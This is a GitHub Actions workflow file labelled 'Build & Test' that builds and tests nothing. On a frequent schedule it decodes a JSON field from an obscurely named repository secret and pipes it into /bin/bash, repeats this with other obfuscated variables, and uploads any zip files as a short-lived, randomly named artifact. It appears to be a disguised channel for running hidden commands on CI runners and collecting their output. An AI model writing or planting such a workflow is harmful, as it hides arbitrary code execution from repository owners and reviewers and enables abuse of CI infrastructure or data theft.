name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '46 4,10,16,22 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          rfpnx8: ${{ secrets.rfpnx8 }}
        run: |
          printf '%s' "$rfpnx8" | jq -r .vrr6 | /bin/bash
          echo $hk46755 | jq -r .of223 | /bin/bash
          printf '%s' "$a8" | jq -r .zg95560 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: nO4PfA0Q
          path: "*.zip"
          retention-days: 1
